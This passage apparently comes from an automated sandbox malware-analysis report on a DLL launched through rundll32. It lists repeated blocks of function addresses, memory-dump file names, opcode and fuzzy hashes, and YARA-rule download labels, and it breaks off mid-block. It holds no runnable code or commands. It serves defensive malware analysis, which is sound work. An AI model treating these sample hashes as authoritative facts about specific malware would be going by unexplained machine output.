                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 331dae3375a0fa6305df40126488a4bff6e686cc5171010d622d58d40f260426
                                                                                                                                                                                                                            • Instruction ID: 48544d1160a69c51bacb533dc980a1eaad549c9fa6b0bbe95bcbfe020397e00e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 331dae3375a0fa6305df40126488a4bff6e686cc5171010d622d58d40f260426
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6251B432100A5882FBA79E28C0543EC73A1E74C7DEF149215FA890B6C9DF35CA89C749
                                                                                                                                                                                                                            Function 000000018002358C Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3f1521f169cf74d95ece15e03a78e452116ff977b0142b99dced54b29d34fd72
                                                                                                                                                                                                                            • Instruction ID: 62a2911f9bd67c18e2d45558618580614be30743536c5f8b944982a42e03b025
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f1521f169cf74d95ece15e03a78e452116ff977b0142b99dced54b29d34fd72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C45190B2104A4886EBB79F2980567EC2764E74CBDCF15C215FA490B7D9CF25CA4EC700
                                                                                                                                                                                                                            Function 0000000180023B94 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 011540724d302609e1ca098b2542f74536c8cd8279d76363c2ff1d6d02a759c8
                                                                                                                                                                                                                            • Instruction ID: ce76419360eb46ab744b1c3f1b44a46705586ed0bfac4acf8143598b03adfe00
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 011540724d302609e1ca098b2542f74536c8cd8279d76363c2ff1d6d02a759c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8519372104A4C86F7B78E28C0563E827A1E74DBECF158216FA4A1BBD9CF35CA49C741
                                                                                                                                                                                                                            Function 0000000180021D84 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6186dbbcd3f6d985911fb6ca7db60a6b8304a119be04ba099718762d0dd7c8e0
                                                                                                                                                                                                                            • Instruction ID: 087e294bdfea15d98f81e94a6c090dfca813717f9c46732c56575adc328e5faf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6186dbbcd3f6d985911fb6ca7db60a6b8304a119be04ba099718762d0dd7c8e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451A3721046488AEBE79E29C4543E823A0F72DBEDF168225FE590B6D9CF35CA49C701
                                                                                                                                                                                                                            Function 0000000180024D94 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 39835beb923b9216cddd05c3d35b5b4408e3e95062c50fe267c867fe223a16f3
                                                                                                                                                                                                                            • Instruction ID: 5f640b7240c4b68f7c31ce12a66c08cf790448b326a0da588811ca55de4a0fce
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39835beb923b9216cddd05c3d35b5b4408e3e95062c50fe267c867fe223a16f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D51617310464886FBF78E28C1543E82760F74D7DCF168225FA4A0EAD9CF65CA49C745
                                                                                                                                                                                                                            Function 0000000180021188 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 34a953b97938c4157af9c3ff1d9724b36f1db76586dc0815f9dd190e2a118e11
                                                                                                                                                                                                                            • Instruction ID: 99831d0a8012102a17ea5a0d74ec24698082b71743d0f85f0f7cd126c4b9f474
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34a953b97938c4157af9c3ff1d9724b36f1db76586dc0815f9dd190e2a118e11
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB51A172104648CAFBABCE6980143EC27A1E76DBDDF148216FA455AAC9CF35CA4DC705
                                                                                                                                                                                                                            Function 0000000180024198 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: d7e0a524a8ca5fdf337d1f962353407ba3360bcb6a9fd8ae0785798ea4632712
                                                                                                                                                                                                                            • Instruction ID: d2cfe2d24aa71b3430f066b8d0b6ae27e1f046f4dc3e5ba407933bbd8c822b26
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e0a524a8ca5fdf337d1f962353407ba3360bcb6a9fd8ae0785798ea4632712
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A517D73110A48C6FBA7CE2AC0543EC27A0E74DBDCF558215FA491EA89CF25CA4EC745
                                                                                                                                                                                                                            Function 0000000180021784 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b0737e30a4011da0031a707f0f9e0b2d00c095f4cc1c199b976a51f67df6dd95
                                                                                                                                                                                                                            • Instruction ID: a00c95c5cb0e1a807139755c1091991b25a8a1ed3498c35d7eab7b9f6b3467cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0737e30a4011da0031a707f0f9e0b2d00c095f4cc1c199b976a51f67df6dd95
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC51A1321046888AF7A78E39C0643ED27A0E76DBDDF158215FA490B7D9CF35CA49C745
                                                                                                                                                                                                                            Function 0000000180024794 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ab3bb381d371349dfd9a4161939f95090c0753915be8022e5c7b25d683344fa6
                                                                                                                                                                                                                            • Instruction ID: 646a06545c6722949ae0489cf844439a884478adb963f9b8bcc347827d3234fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab3bb381d371349dfd9a4161939f95090c0753915be8022e5c7b25d683344fa6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B519073214A8886F7AB8E28C0543ED27A0E74DBDCF158215FA490EB99CF65CA89C741
                                                                                                                                                                                                                            Function 0000000180022990 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 00635bb530e825c9d0e4eae4fa5f0d04fa1aae9444658eea7062a9f08f751ac7
                                                                                                                                                                                                                            • Instruction ID: c4e33da554af39ad710615a1f5e797122507a8c92191f57cbd2610347cb337db
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00635bb530e825c9d0e4eae4fa5f0d04fa1aae9444658eea7062a9f08f751ac7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3651A07211064897FBB79F68C0553EC27A0E74CBDCF158215FE590BA99CF25CA8AC706
                                                                                                                                                                                                                            Function 0000000180022F8C Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 808d36c95613ca1d96f87815bd2e9d4730f0d84ed3a8b0da53525a61fe22eb95
                                                                                                                                                                                                                            • Instruction ID: d6e1677531b3a496854411c86ee74cd0d779fe025018eda0722ff9683e8740e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 808d36c95613ca1d96f87815bd2e9d4730f0d84ed3a8b0da53525a61fe22eb95
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D251A372200A4886F7A79F29C4663ED37A0E70DBDCF158215FA490B699CF25CA4EC751
                                                                                                                                                                                                                            Function 00000001800221A0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 11f428b0f98b7b173f0c01802dd16e1e8637fc4858c1655c8fd3ad3d4946b8d2
                                                                                                                                                                                                                            • Instruction ID: e33614bd2a780dec1686e47beb4e2f72314e00fe528fbd3313490090ca0f5cb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11f428b0f98b7b173f0c01802dd16e1e8637fc4858c1655c8fd3ad3d4946b8d2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0951C673600618E2E7AB8F68C1543AC2760F759BA8F148215EF25177D8DF35DE49C780
                                                                                                                                                                                                                            Function 00000001800251B0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e7e60a0049f3eb4e567eb1a50ce9358f85fa15bb52d747390f53d662bd00ce04
                                                                                                                                                                                                                            • Instruction ID: c4c80b8e2522cbaf43e69af424d1c7b52ee649788601b992e4c6bb7a9175c7d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7e60a0049f3eb4e567eb1a50ce9358f85fa15bb52d747390f53d662bd00ce04
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C351B473610A58C2E7AB8F28C0543AD27A0E359BEAF149115EF8A177D9CF31DE49C784
                                                                                                                                                                                                                            Function 00000001800233A0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c02ea306fbf56ebc0ee9a8d132ff1494b235b7fb113b3db9fbf5f68687ba4a5e
                                                                                                                                                                                                                            • Instruction ID: 0498a4451ec7f18fc09f5a8839ad3fef25377b7a649b96a3b167ae9e24502cc9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c02ea306fbf56ebc0ee9a8d132ff1494b235b7fb113b3db9fbf5f68687ba4a5e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51C673604A5883E7AF9F28C0563AC27A0E758BA8F158115EF0A177D9DF31DE46C780
                                                                                                                                                                                                                            Function 00000001800225BC Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
